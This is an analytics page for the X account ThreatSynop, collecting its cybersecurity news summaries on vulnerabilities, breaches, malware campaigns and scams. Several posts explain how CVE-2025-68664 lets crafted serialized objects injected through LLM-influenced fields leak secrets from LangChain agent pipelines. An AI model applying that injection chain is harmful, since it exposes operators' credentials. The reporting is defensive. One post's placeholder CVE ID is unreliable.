#  @ThreatSynop ThreatSynop ThreatSynop posts on X about ai, microsoft, $googl, command the most. They currently have [---] followers and [----] posts still getting attention that total [-----] engagements in the last [--] hours. ### Engagements: [-----] [#](/creator/twitter::1895062050126094337/interactions)  - [--] Week [-----] -6.80% - [--] Month [------] +27% - [--] Months [------] +30,212% ### Mentions: [--] [#](/creator/twitter::1895062050126094337/posts_active)  - [--] Month [-----] +36% - [--] Months [-----] +29,283% ### Followers: [---] [#](/creator/twitter::1895062050126094337/followers)  - [--] Week [---] +17% - [--] Month [---] +174% - [--] Months [---] +5,100% ### CreatorRank: [---------] [#](/creator/twitter::1895062050126094337/influencer_rank)  ### Social Influence **Social category influence** [technology brands](/list/technology-brands) [stocks](/list/stocks) [finance](/list/finance) [countries](/list/countries) [social networks](/list/social-networks) [cryptocurrencies](/list/cryptocurrencies) [exchanges](/list/exchanges) [travel destinations](/list/travel-destinations) [automotive brands](/list/automotive-brands) [gaming](/list/gaming) **Social topic influence** [ai](/topic/ai), [microsoft](/topic/microsoft), [$googl](/topic/$googl), [command](/topic/command) #1296, [reduce](/topic/reduce), [target](/topic/target), [data](/topic/data), [crypto](/topic/crypto), [systems](/topic/systems) #2228, [agentic](/topic/agentic) #1593 **Top accounts mentioned or mentioned by** [@transilienceai](/creator/undefined) [@reactnativecommunitycli](/creator/undefined) [@vuln_tracker](/creator/undefined) [@reactrouternode](/creator/undefined) [@remixrunnode](/creator/undefined) [@remixrundeno](/creator/undefined) [@mailio](/creator/undefined) [@vietmoneyreactbigcalendar](/creator/undefined) [@60hz](/creator/undefined) [@adonisjsbodyparser](/creator/undefined) [@username](/creator/undefined) [@tenantonmicrosoftcom](/creator/undefined) [@gmailcom](/creator/undefined) [@aliceararau29](/creator/undefined) [@ihackedthegovernment](/creator/undefined) [@lastpassserver8](/creator/undefined) [@sr22vegascom](/creator/undefined) [@lmanchu](/creator/undefined) [@malwarebytes](/creator/undefined) [@reactnativecommunitycliserverapi](/creator/undefined) **Top assets mentioned** [Microsoft Corp. (MSFT)](/topic/microsoft) [Alphabet Inc Class A (GOOGL)](/topic/$googl) [Crowdstrike Holdings Inc (CRWD)](/topic/crowdstrike) [Cloudflare, Inc. (NET)](/topic/cloudflare) [Zscaler Inc (ZS)](/topic/$zs) [IBM (IBM)](/topic/ibm) [ServiceNow Inc (NOW)](/topic/servicenow) [Bitcoin (BTC)](/topic/bitcoin) ### Top Social Posts Top posts by engagements in the last [--] hours "🚨 : On Safer Internet Day February [--] [----] Trend Micro a global cybersecurity leader announced enhancements to its ScamCheck tool to help consumers identify potential scams and address growing AI threats like deepfakes. :: #Cybersecurity #ScamPrevention #AIThreats Is the News Cybersecurity-Related: Yes it focuses on enhancing tools to combat online scams and AI-driven threats. ☠ ( ):: Not specified. 🕷 ( ):: Not applicable. 🌐 ( ):: Global. 🕵 :: This is a new development building upon Trend Micro's ongoing efforts to combat online scams and emerging AI threats. 🔎 ::" [X Link](https://x.com/ThreatSynop/status/1901735321043374433) 2025-03-17T20:40Z [--] followers, [--] engagements "🚨 : The U.S. State Department's Global Engagement Center (GEC) established in [----] to counter foreign disinformation campaigns faced potential closure after its funding was omitted from the National Defense Authorization Act (NDAA) in December [----]. However subsequent legislative actions ensured the continuation of its functions under a new designation. :: #GovernmentPolicy #Disinformation #NationalSecurity Is the News Cybersecurity-Related: Yes as it pertains to governmental efforts in combating foreign disinformation which is a significant aspect of cybersecurity and information" [X Link](https://x.com/ThreatSynop/status/1901744867685871784) 2025-03-17T21:18Z [--] followers, [--] engagements "🚨 : CrowdStrike has achieved Federal Risk and Authorization Management Program (FedRAMP) authorization for several modules within its Falcon cybersecurity platform specifically for use in the GovCloud environment. These modules include Falcon Next-Gen SIEM Falcon for IT and Falcon Data Protection all now available to government entities requiring FedRAMP Moderate authorization. :: #Cybersecurity #FedRAMP #GovCloud #CrowdStrike Is the News Cybersecurity-Related: Yes it pertains to the authorization of cybersecurity modules designed to enhance the protection of government entities operating" [X Link](https://x.com/ThreatSynop/status/1901745077946331238) 2025-03-17T21:18Z [--] followers, [--] engagements "🚨 : Google's March [----] security update addresses [--] vulnerabilities affecting Android devices including two actively exploited flaws: CVE-2024-43093 A privilege escalation vulnerability in the Android framework with a CVSS score of [---]. Exploitation requires user interaction allowing attackers to gain elevated privileges without additional execution rights. CVE-2024-50302 : Details unspecified but noted as under limited targeted exploitation. The update includes two patch levels2025-03-01 and 2025-03-05to facilitate timely fixes across various devices. Users of Google Pixel devices" [X Link](https://x.com/ThreatSynop/status/1901973962646507854) 2025-03-18T12:28Z [--] followers, [--] engagements "🚨 : 🚨 Brief Summary of the News: Federal agencies are accelerating digital transformation efforts to meet public expectations and comply with mandates. Transitioning securely to platforms like Salesforce requires specialized assistance to ensure data protection and regulatory compliance. Companies like Own Company offer solutions focusing on secure development data recovery and long-term data archiving to support these modernization initiatives. # : #DigitalTransformation #Cybersecurity #DataProtection #GovernmentIT #Compliance Is the News Cybersecurity-Related: Yes. It discusses the" [X Link](https://x.com/ThreatSynop/status/1902129701142790517) 2025-03-18T22:47Z [--] followers, [--] engagements "🚨 : 🚨 CrowdStrike's Falcon platform has achieved Federal Risk and Authorization Management Program (FedRAMP) High Authorization enabling U.S. federal agencies public sector organizations and critical infrastructure entities to secure mission-critical systems and data against cyber threats. This authorization signifies compliance with the highest federal security standards allowing CrowdStrike to protect highly sensitive information across various sectors. # : #Cybersecurity #FedRAMPHigh #GovernmentSecurity #CloudSecurity #Compliance Is the News Cybersecurity-Related: Yes. It pertains to" [X Link](https://x.com/ThreatSynop/status/1902432165343719485) 2025-03-19T18:49Z [--] followers, [--] engagements "🚨 : 🚨 The Hacker News reports that Hewlett Packard Enterprise (HPE) has released security updates to address a **critical vulnerability in HPE OneView** that received a CVSS score of **10.0** the highest possible severity. The flaw (CVE2025XXXX) impacts the HPE OneView management platform used for infrastructure automation and monitoring potentially allowing an unauthenticated attacker to perform **remote code execution** with elevated privileges. HPE has urged users to apply the patches immediately and provided mitigation guidance to reduce exposure while updates are deployed. # :" [X Link](https://x.com/ThreatSynop/status/2001816513657864383) 2025-12-19T00:47Z [--] followers, [--] engagements "🚨 : 🚨 The Hacker News reports that Hewlett Packard Enterprise (HPE) has released security updates to address a **critical vulnerability in HPE OneView** that received a CVSS score of **10.0** the highest possible severity. The flaw (CVE2025XXXX) impacts the HPE OneView management platform used for infrastructure automation and monitoring potentially allowing an unauthenticated attacker to perform **remote code execution** with elevated privileges. HPE has urged users to apply the patches immediately and provided mitigation guidance to reduce exposure while updates are deployed. # :" [X Link](https://x.com/ThreatSynop/status/2001817356188717431) 2025-12-19T00:50Z [--] followers, [--] engagements "🚨 : 🚨 The Hacker News discusses the evolving need for **dynamic AI SaaS security** as organizations increasingly adopt softwareasaservice platforms powered by artificial intelligence. The article highlights challenges in securing AIenabled SaaS apps such as API exposure data leakage privilege escalation risks and the complexity of applying traditional security controls to dynamic AI workflows. It emphasizes proactive monitoring contextual access governance continuous anomaly detection and tailored security controls as essential elements for reducing risk in AIcentric SaaS environments. # :" [X Link](https://x.com/ThreatSynop/status/2001818074123485204) 2025-12-19T00:53Z [--] followers, [--] engagements "🚨 : 🚨 WatchGuard released urgent security updates for a critical Fireware OS vulnerability (CVE-2025-14733 CVSS 9.3) that is being actively exploited to achieve remote unauthenticated code execution via the IKEv2 VPN component (iked). The issue affects Mobile User VPN (IKEv2) and Branch Office VPN (IKEv2) when configured with a dynamic gateway peer and WatchGuard published fixed versions (e.g. 2025.1.4 12.11.6 12.5.15 and 12.3.1 Update [--] for FIPS). The company also shared indicators of attack/compromise such as abnormal IKE certificate-chain behavior unusually large CERT payloads and iked" [X Link](https://x.com/ThreatSynop/status/2002524188368621906) 2025-12-20T23:39Z [--] followers, [--] engagements "🚨 : 🚨 CISA added a critical ASUS Live Update vulnerability (CVE-2025-59374 CVSS 9.3) to its Known Exploited Vulnerabilities (KEV) catalog after evidence of active exploitation. The flaw is described as an embedded malicious code issue tied to a prior supply-chain compromise in which certain ASUS Live Update client versions were distributed with unauthorized modifications. The compromised builds could trigger unintended actions only on devices that matched specific targeting conditions and the incident is linked to the [----] Operation ShadowHammer campaign disclosed in [----]. ASUS stated the" [X Link](https://x.com/ThreatSynop/status/2002524327321784475) 2025-12-20T23:39Z [--] followers, [--] engagements "🚨 : 🚨 Cisco warned of active attacks exploiting an unpatched maximum-severity zero-day in Cisco AsyncOS (CVE-2025-20393 CVSS 10.0) affecting Cisco Secure Email Gateway and Cisco Secure Email and Web Manager. Cisco said it became aware of the intrusion campaign on December [--] [----] and that only a limited subset of appliances appear affected with attackers gaining root-level command execution and deploying a persistence mechanism. Exploitation requires the Spam Quarantine feature to be enabled and internet-reachable (it is not enabled by default). Cisco observed the actor (UAT-9686) using" [X Link](https://x.com/ThreatSynop/status/2002524350407180689) 2025-12-20T23:39Z [--] followers, [--] engagements "🚨 : 🚨 SonicWall released patches for an actively exploited Secure Mobile Access (SMA) [---] series vulnerability (CVE-2025-40602) that allows local privilege escalation due to insufficient authorization in the Appliance Management Console (AMC). SonicWall said attackers have leveraged it in combination with the previously fixed critical flaw CVE-2025-23006 to achieve unauthenticated remote code execution with root privileges. Fixed hotfix builds were issued for affected SMA [---] versions and CISA added CVE-2025-40602 to its Known Exploited Vulnerabilities (KEV) catalog with a short remediation" [X Link](https://x.com/ThreatSynop/status/2002524373349978341) 2025-12-20T23:39Z [--] followers, [--] engagements "🚨 : 🚨 North Korealinked Kimsuky has been linked to a campaign distributing an updated Android malware variant called DocSwap via QR codes on phishing sites spoofing South Koreas CJ Logistics. Victims are lured through pop-ups and delivery-themed social engineering to install a fake security/shipment tracking app from an external server; the dropper decrypts an embedded encrypted APK launches a RAT service and uses decoy OTP-style verification before opening the real CJ Logistics tracking page to reduce suspicion. Once active the malware connects to an attacker server and supports dozens of" [X Link](https://x.com/ThreatSynop/status/2002678826145366048) 2025-12-21T09:53Z [--] followers, [--] engagements "🚨 : 🚨 The Hacker News reports that Hewlett Packard Enterprise (HPE) has released security updates to address a **critical vulnerability in HPE OneView** that received a CVSS score of **10.0** the highest possible severity. The flaw (CVE2025XXXX) impacts the HPE OneView management platform used for infrastructure automation and monitoring potentially allowing an unauthenticated attacker to perform **remote code execution** with elevated privileges. HPE has urged users to apply the patches immediately and provided mitigation guidance to reduce exposure while updates are deployed. # :" [X Link](https://x.com/ThreatSynop/status/2002876962310610985) 2025-12-21T23:00Z [--] followers, [--] engagements "🚨 Fake PoCs and AI Slop Are Polluting Vulnerability Response and Creating Dangerous False Negatives AI-generated and non-working proof-of-concept exploits are flooding high-profile vulnerability cycles (highlighted via the React2Shell CVSS [----] case) misleading defenders into thinking theyre safe because scanners built on bad PoCs return not vulnerable. The impact is delayed patching and mis-triage: teams deprioritize real risk while attackers iterate past broken public PoCs and exploit faster than organizations can remediate. 🔹 Key Details: Trend Micro tracked [---] public exploits for" [X Link](https://x.com/ThreatSynop/status/2002879855298257105) 2025-12-21T23:12Z [--] followers, [--] engagements "🚨 Askul RansomHouse Ransomware Breach Exposes 700K+ Records Disrupts Japan Logistics Operations Askul disclosed that a ransomware attack detected on October [--] [----] disrupted its highly automated order/shipping systems and led to the theft and leak of customer partner and employee data with RansomHouse claiming roughly 1TB of stolen files. This matters because it shows how credential-based intrusion plus backup destruction can turn a single enterprise incident into nationwide supply-chain disruption and mass PII exposure. 🕷 Malware: RansomHouse (ransomware / data-extortion) 🎯 Target: Japan" [X Link](https://x.com/ThreatSynop/status/2003467096525512734) 2025-12-23T14:05Z [--] followers, [--] engagements "🚨 Kimsuky Pushes DocSwap Android RAT via QR-Code Phishing Pages Posing as CJ Logistics Kimsuky is using delivery-themed phishing sites that force desktop visitors to scan a QR code leading Android victims to install a trojan SecDelivery.apk dropper that decrypts an embedded APK and launches DocSwap with full RAT control (including data theft and audio/camera/file ops) over an attacker server (27.102.137.181). This matters because it blends smishing/phishing QR redirection and convincing OTP-style decoys to bypass unknown sources warnings and turn routine parcel-tracking behavior into" [X Link](https://x.com/ThreatSynop/status/2003844208768000009) 2025-12-24T15:04Z [--] followers, [--] engagements "🚨 ProBit Global Alleged Breach: 700K User Records Offered for Sale on Cybercrime Forum A threat actor claims to be selling a database allegedly tied to ProBit Global containing [------] rows of user data for $2500 USDT including PII (names emails phone DOB full address) and banking details (bank/branch IFSC account holder/name/number). Treat this as unverified until ProBit confirms but the potential impact is high-risk identity fraud targeted phishing and financial-account abuse for affected users. 🕷 Malware: N/A 🎯 Target: South Korea/Cryptocurrency Exchange Users (Global user base) #" [X Link](https://x.com/ThreatSynop/status/2003884137720017375) 2025-12-24T17:43Z [--] followers, [--] engagements "🚨 SideWinder APT Impersonates Indias Income Tax Dept to Deliver DLL Side-Loaded Implant SideWinder (Rattlesnake/APT-C-17) is running a hyper-targeted phishing campaign that lures Indian victims to a fake Income Tax portal and delivers abusing a legit Microsoft Defender binary (SenseCE.exe) to side-load a malicious DLL (MpGear.dll) and stage a resident agent (mysetup.exe) that beacons to C2 while mimicking Chinese enterprise-tool protocols. The chain includes timezone-based geofencing and cloud-hosted payload delivery (URL shorteners + GoFile) to evade reputation-based controls. 🕷 Malware:" [X Link](https://x.com/ThreatSynop/status/2003898478007619665) 2025-12-24T18:40Z [--] followers, [--] engagements "🚨 Wonderland Android Malware Steals OTPs via Real-Time SMS Hijacking and Remote USSD Control Group-IB reports Wonderland targets Uzbekistan users with dropper-based infections that unpack an encrypted SMS-stealer locally (even without internet) then uses bidirectional WebSocket C2 to execute live commands like SMS sending notification suppression call-forwarding and arbitrary USSD requeststurning phones into remotely operated fraud agents. The operation also hardens itself with fast-changing app/package names anti-analysis checks (emulator/root/Frida) and resilient domain onboarding via a" [X Link](https://x.com/ThreatSynop/status/2003901826408595636) 2025-12-24T18:53Z [--] followers, [--] engagements "🚨 MacSync Stealer Levels Up: Signed + Notarized Swift Dropper Slips Past Gatekeeper Jamf reports MacSync Stealer is now delivered as a fully code-signed and notarized Swift application inside a fake DMG allowing it to pass Gatekeeper checks and quietly fetch/execute a second-stage script from /tmp with rate-limiting and anti-analysis hygiene. This shift materially lowers user friction and detection odds enabling faster credential/data theft under the cover of Apple trust signals. 🕷 Malware: MacSync Stealer 🎯 Target: Global/macOS Users # Category: #macOS #Malware #InfoStealer #MacSync" [X Link](https://x.com/ThreatSynop/status/2003966682163724686) 2025-12-24T23:11Z [--] followers, [--] engagements "🚨 Fake Phantom Shuttle Chrome VPN Extensions Run a Stealth Proxy MITM to Steal Credentials Socket reports two Phantom Shuttle () Chrome extensions have operated since [----] silently injecting hardcoded proxy credentials and forcing traffic for 170+ high-value domains through attacker-controlled proxies to capture logins cookies tokens and form data. The extensions also beacon every [--] seconds and periodically exfiltrate user emails and plaintext passwords creating immediate account-takeover and supply-chain risk (GitHub/npm/cloud consoles). 🕷 Malware: Phantom Shuttle (malicious Chrome" [X Link](https://x.com/ThreatSynop/status/2003967230036639990) 2025-12-24T23:13Z [--] followers, [--] engagements "🚨 U.S. Seizes to Disrupt $14.6M Bank Account Takeover Scheme The U.S. Justice Department seized a domain and credential database used as a control panel for criminals running malvertising-based bank account takeovers where fake Google/Bing ads redirected victims to counterfeit bank logins that captured credentials. The FBI has identified at least [--] victims so far with $28M attempted losses and $14.6M confirmed and investigators say the infrastructure supported the operation as recently as November [----]. 🕷 Malware: N/A 🎯 Target: USA/Finance (bank customers targeted via search-ad" [X Link](https://x.com/ThreatSynop/status/2003976539038232621) 2025-12-24T23:50Z [--] followers, [--] engagements "🚨 Cl0p Linked to University of Phoenix Breach Affecting 3.5M People The University of Phoenix is notifying roughly [---] million individuals after an August [----] intrusion attributed to the broader Cl0p extortion ecosystem with exposed data reportedly including high-risk identifiers such as SSNs and bank routing/account details. The key risk is downstream identity theft and financial fraud at scale amplified by highly targeted phishing using verified personal data. 🕷 Malware: Cl0p (extortion actor) 🎯 Target: USA/Education # Category: #DataBreach #Cl0p #Extortion #HigherEd #PII #IdentityTheft" [X Link](https://x.com/ThreatSynop/status/2003978709565345880) 2025-12-24T23:58Z [--] followers, [--] engagements "🚨 SEC Sues Crypto Investment Clubs That Used Deepfake Ads and WhatsApp to Steal $14M The SEC sued multiple entities behind WhatsApp-based investment clubs that used deepfake videos and fake professors to lure retail investors into opening accounts on sham crypto platforms (Morocoin Berge Cirkor) and buying fake offerings then demanded extra fees when victims tried to withdraw. The scheme allegedly ran Jan 2024Jan [----] and routed stolen funds through overseas banks and crypto wallets. 🕷 Malware: N/A 🎯 Target: USA/Finance (Retail Investors) # Category: #CryptoScam #SEC #InvestmentFraud" [X Link](https://x.com/ThreatSynop/status/2003981977213366527) 2025-12-25T00:11Z [--] followers, [--] engagements "🚨 SEC Charges Firms Behind $14M Crypto Scam Using Fake AI Signals in WhatsApp Investment Clubs The SEC alleges scammers used social-media ads to lure retail investors into WhatsApp investment clubs led by fake professors/assistants pushing supposed AI-generated trade tips then funneled victims to bogus crypto platforms and fake security token offerings before blocking withdrawals and demanding extra fees. At least $14M was stolen and moved offshore through bank accounts and crypto wallets highlighting how AI-themed credibility + closed messaging groups can scale fraud fast. 🕷 Malware: N/A" [X Link](https://x.com/ThreatSynop/status/2003985848279212308) 2025-12-25T00:27Z [--] followers, [--] engagements "🚨 Everest Ransomware Claims Breaches of Accela and Notin Threatening Massive Data Leaks Everest says it exfiltrated 1TB+ of internal Accela data (including tens of thousands of PDFs/CSVs and backup files) and 145GB from Spains containing sensitive legal workflows and identity documents indicating a high-impact double-extortion play. If validated this creates serious downstream risk for government permitting/licensing processes and notary-related identity theft and fraud. 🕷 Malware: Everest (ransomware / double-extortion) 🎯 Target: USA/GovTech + Spain/Legal Sector # Category: #Ransomware" [X Link](https://x.com/ThreatSynop/status/2003995221617504573) 2025-12-25T01:04Z [--] followers, [--] engagements "🚨 FBI Seizes Backend Panel Used to Run Bank Account Takeovers U.S. authorities seized the domain and its database after criminals used Google/Bing lookalike bank ads to funnel victims to phishing pages and store/operate thousands of stolen banking credentials for account takeover fraud. Investigators linked the scheme to at least [--] U.S. victims with $14.6M in losses (and $28M attempted) with infrastructure still active as recently as November [----]. 🕷 Malware: N/A 🎯 Target: USA/Finance # Category: #FBI #AccountTakeover #Phishing #Malvertising #CredentialTheft #FinancialFraud #DomainSeizure" [X Link](https://x.com/ThreatSynop/status/2004011239291199665) 2025-12-25T02:08Z [--] followers, [--] engagements "🚨 Microsoft Teams Adds Defender-Portal Controls to Block External Users and Domains Microsoft is rolling out an integration that lets security admins manage Teams external blocks (domains and specific email addresses) directly from the Microsoft Defender portal via the Tenant Allow/Block List with support for up to [----] domains and [---] emails. This centralizes response to phishing/spam and risky external contacts without changing existing federation/domain block settings in the Teams admin center. 🕷 Malware: N/A 🎯 Target: Global/Enterprise Collaboration (Microsoft Teams) # Category:" [X Link](https://x.com/ThreatSynop/status/2004013416063635680) 2025-12-25T02:16Z [--] followers, [--] engagements "🚨 Fortinet: 5-Year-Old FortiOS SSL VPN 2FA Bypass Now Actively Exploited Fortinet reports in-the-wild abuse of CVE-2020-12812 where attackers can bypass FortiToken 2FA by changing the usernames letter case under specific local user + remote auth (e.g. LDAP) configurations. Patch affected FortiOS releases and audit SSL-VPN auth logs for suspicious case-variant logins and unexpected successful sessions. 🕷 Malware: N/A 🎯 Target: Global/Organizations Running FortiOS SSL-VPN # Category: #Fortinet #FortiOS #SSLVPN #CVE202012812 #2FABypass #Authentication #VPN #PatchManagement #ThreatIntel 🔗" [X Link](https://x.com/ThreatSynop/status/2004959575057834143) 2025-12-27T16:56Z [--] followers, [--] engagements "🚨 ChatGPT Adds Formatting Blocks to Turn Drafts Into Rich-Text Task Editors OpenAI is rolling out formatting blocks that display outputs like emails/blog drafts inside a rich-text area with an inline toolbar (bold lists quotes alignment) letting users edit content directly in ChatGPT instead of copy/pasting into Word or Gmail. 🕷 Malware: N/A 🎯 Target: Global/ChatGPT Users # Category: #OpenAI #ChatGPT #AI #ProductUpdate #RichText #UX #Productivity 🔗 URL: https://www.bleepingcomputer.com/news/artificial-intelligence/chatgpts-new-formatting-blocks-make-its-ui-look-more-like-a-task-tool/" [X Link](https://x.com/ThreatSynop/status/2004960665853657374) 2025-12-27T17:00Z [--] followers, [--] engagements "🚨 Critical LangChain Flaw Lets Attackers Exfiltrate Secrets via Unsafe Deserialization A critical bug in langchain-core serialization (CVE-2025-68664) enables prompt/LLM-outputinfluenced data to trigger unsafe deserialization paths (e.g. logging/streaming/caching) leaking environment secrets (and potentially enabling further abuse such as SSRF via allowlisted classes). Patch by upgrading langchain-core (fixed in 0.3.81 / 1.2.5) and treat all LLM outputs as untrustedespecially where dumps()/dumpd() and event streaming are used. 🕷 Malware: N/A 🎯 Target: Global/AI Apps & LLM Agent Pipelines #" [X Link](https://x.com/ThreatSynop/status/2004962300092948942) 2025-12-27T17:07Z [--] followers, [--] engagements "🚨 Critical LangChain Serialization Injection Bug Exposes Secrets and May Enable Code Execution A critical flaw in langchain-core (CVE-2025-68664) lets attackers inject crafted lc structures so user-controlled data is treated as LangChain objects during deserialization enabling environment-secret extraction (e.g. when secrets_from_env is enabled) and potentially risky object instantiation paths. Update to langchain-core 1.2.5 or 0.3.81 and restrict deserialization via allowlists to reduce prompt-injection-to-secret-leak chains. 🕷 Malware: N/A 🎯 Target: Global/LLM Apps & Agent Pipelines" [X Link](https://x.com/ThreatSynop/status/2004963932406993234) 2025-12-27T17:13Z [--] followers, [--] engagements "🚨 LangGrinch: Critical LangChain-Core Bug Enables Secret Theft via Serialization Injection (CVE-2025-68664) Attackers can inject crafted lc-key objects through user-influenced fields (e.g. metadata additional_kwargs response_metadata) so dumps()/dumpd() content is later deserialized as trusted LangChain objects enabling environment secret extraction (and potentially RCE paths like Jinja2 templating). Upgrade langchain-core to 1.2.5 (or 0.3.81) and enforce the new allowlist-based allowed_objects defaults (with secrets_from_env now disabled). 🕷 Malware: N/A 🎯 Target: Global/LLM Apps & Agent" [X Link](https://x.com/ThreatSynop/status/2004964477649723501) 2025-12-27T17:15Z [--] followers, [--] engagements "🚨 Trust Wallet Chrome Extension Supply-Chain Attack Drains $7M in Crypto A compromised Trust Wallet Chrome extension update (v2.68.0 released Dec 24) injected obfuscated code to exfiltrate wallet secrets to a newly registered domain (api.metrics-trustwallet.com) leading to roughly $7M in theft; attackers also ran a parallel phishing campaign (fix-trustwallet.com) to trick users into surrendering seed phrases. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #Crypto #SupplyChainAttack #BrowserExtension #SeedPhrase #Phishing #CryptoTheft" [X Link](https://x.com/ThreatSynop/status/2004965021651272121) 2025-12-27T17:18Z [--] followers, [--] engagements "🚨 Trust Wallet Chrome Extension Supply-Chain Hack Drains $7M from Users A compromised Trust Wallet Chrome extension update (v2.68.0 released Dec [--] 2025) contained obfuscated code that exfiltrated seed phrases on import to a look-alike domain enabling rapid wallet draining and parallel phishing via fake fix sites. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase #Phishing #IncidentResponse 🔗 URL: https://cybersecuritynews.com/trustwallet-chrome-extension-hacked/" [X Link](https://x.com/ThreatSynop/status/2004966714975363125) 2025-12-27T17:24Z [--] followers, [--] engagements "🚨 Chaos Ransomware Claims 150GB Leak From Italys Veplastic Chaos ransomware says it breached Veplastic (VEPLASTIC S.r.l.) and moved into the extortion/leak phase after listing the firm on its dark-web site with an alleged 150GB haul. The exposed dataset is described as including financials supplier/customer contracts and contacts proprietary compound formula/specs employee PII and internal communicationscreating both business disruption and IP/identity risk. 🕷 Malware: Chaos Ransomware 🎯 Target: Italy/Manufacturing (Plastics & Industrial Supply Chain) # Category: #Ransomware #Chaos" [X Link](https://x.com/ThreatSynop/status/2004968348375716256) 2025-12-27T17:31Z [--] followers, [--] engagements "🚨 Trust Wallet Chrome Extension Backdoor Drains $7M After Malicious v2.68 Release A malicious Trust Wallet Chrome extension update (v2.68) stole users decrypted mnemonic phrases during wallet unlock and exfiltrated them to api.metrics-trustwallet.com enabling attackers to drain funds ($7M) and launder via exchanges/bridges; Trust Wallet says the release was pushed using a leaked Chrome Web Store API key bypassing normal checks. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase" [X Link](https://x.com/ThreatSynop/status/2004969436772794412) 2025-12-27T17:35Z [--] followers, [--] engagements "🚨 China-Linked Evasive Panda Runs DNS Poisoning to Push MgBot via Fake Software Updates Kaspersky says Evasive Panda (StormBamboo/Bronze Highland) poisoned DNS responses to redirect legitimate update checks (e.g. SohuVA iQIYI IObit Tencent QQ even requests) to attacker infrastructure delivering a multi-stage loader that decrypts shellcode and installs the MgBot backdoor. This matters because DNS-layer manipulation can silently subvert trusted update flows across specific ISPs/regions enabling high-stealth espionage with minimal endpoint indicators. 🕷 Malware: MgBot 🎯 Target: Trkiye / China" [X Link](https://x.com/ThreatSynop/status/2004969979582558320) 2025-12-27T17:37Z [--] followers, [--] engagements "🚨 Aflac Confirms June Breach Impacting 22M+ Customers Aflac says an unauthorized actor accessed files on June [--] [----] (no ransomware contained within hours) and later determined the incident affected personal data tied to over [--] million individuals triggering large-scale notifications. The impact is high due to potential exposure of sensitive identity/insurance data that can drive fraud identity theft and targeted social engineering. 🕷 Malware: N/A 🎯 Target: USA/Insurance # Category: #DataBreach #Aflac #Insurance #PII #IdentityTheft #IncidentResponse #Cybercrime 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2004970585840087352) 2025-12-27T17:40Z [--] followers, [--] engagements "🚨 Fake Grubhub Holiday Crypto Promotion Emails Push 10x Bitcoin Scam Attackers sent unauthorized emails that appeared to come from Grubhubs legitimate subdomain urging recipients to send Bitcoin to a wallet with a false promise of a 10x payout; Grubhub says it contained the issue and is taking steps to prevent recurrence. 🕷 Malware: N/A 🎯 Target: Global/Grubhub merchant partners & recipients # Category: #CryptoScam #BusinessEmailCompromise #BrandImpersonation #Phishing #Fraud #EmailSecurity 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2004971671124402478) 2025-12-27T17:44Z [--] followers, [--] engagements "🚨 Trust Wallet Confirms Malicious Chrome Extension Update Caused $7M Crypto Theft Trust Wallet says a compromised Chrome extension release (v2.68.0 on Dec 24) included hidden code that exfiltrated wallet secrets to api.metrics-trustwallet.com enabling $7M in theft while attackers also pushed a fix-trustwallet.com phishing site to steal recovery phrases. Users should update to v2.69 immediately and move remaining funds to a new wallet/seed if they opened v2.68.0. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack" [X Link](https://x.com/ThreatSynop/status/2004972216023142776) 2025-12-27T17:46Z [--] followers, [--] engagements "🚨 Trust Wallet Urges Immediate Chrome Extension Update After $7M Losses Trust Wallet says a security incident affecting its Chrome extension v2.68 led to $7M in losses after malicious code decrypted users mnemonics (using the wallet password) and exfiltrated them to an attacker-controlled domain enabling rapid wallet draining; users must upgrade to v2.69 and beware of off-channel messages/phishing. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase #Phishing #IncidentResponse 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2004973301278355461) 2025-12-27T17:51Z [--] followers, [--] engagements "🚨 TeamViewer DEX NomadBranch Bugs Enable LAN RCE DoS and Data Exposure Multiple flaws in TeamViewer DEX Clients Content Distribution Service (NomadBranch.exe) can let an adjacent-network attacker bypass integrity checks for code execution (CVE-2025-44016) or crash/abuse the service for DoS and potential sensitive-data exposure (incl. CVE-2025-12687) fixed in 25.11.0.29 with hotfixes for select legacy branches. 🕷 Malware: N/A 🎯 Target: Global/Windows Enterprise (TeamViewer DEX on shared LAN) # Category: #TeamViewer #DEX #NomadBranch #CVE202544016 #CVE202512687 #CVE202546266 #RCE #DoS" [X Link](https://x.com/ThreatSynop/status/2004974389142401064) 2025-12-27T17:55Z [--] followers, [--] engagements "🚨 New MongoDB Flaw Lets Unauthenticated Attackers Read Uninitialized Heap Memory (CVE-2025-14847) A high-severity zlib compression parsing issue (length-field mismatch) can let unauthenticated clients trigger MongoDB to return uninitialized heap memory potentially disclosing sensitive in-memory data that aids further exploitation; upgrade to fixed releases (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until patched. 🕷 Malware: N/A 🎯 Target: Global/Databases & Backend Infrastructure # Category: #MongoDB #CVE202514847 #Vulnerability #InfoDisclosure #Zlib" [X Link](https://x.com/ThreatSynop/status/2004975476079489150) 2025-12-27T17:59Z [--] followers, [--] engagements "🚨 Trust Wallet Chrome Extension Supply-Chain Hack Leads to $7M Crypto Theft Attackers pushed a malicious Trust Wallet Chrome extension update (v2.68) that exfiltrated users decrypted seed phrases to attacker infrastructure enabling rapid wallet draining and millions in losses. Users should update to the fixed release and rotate wallets/seeds if they interacted with the compromised version. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase #IncidentResponse #ThreatIntel 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2004976627222999548) 2025-12-27T18:04Z [--] followers, [--] engagements "🚨 MongoBleed PoC Drops: Unauthenticated MongoDB Memory Leak Now Easy to Exploit A new mongobleed PoC exploits CVE-2025-14847 by abusing MongoDBs zlib decompression handling (inflated uncompressedSize) to leak uninitialized heap memory over the network potentially exposing internal configs system stats paths and client details; patch to fixed MongoDB releases 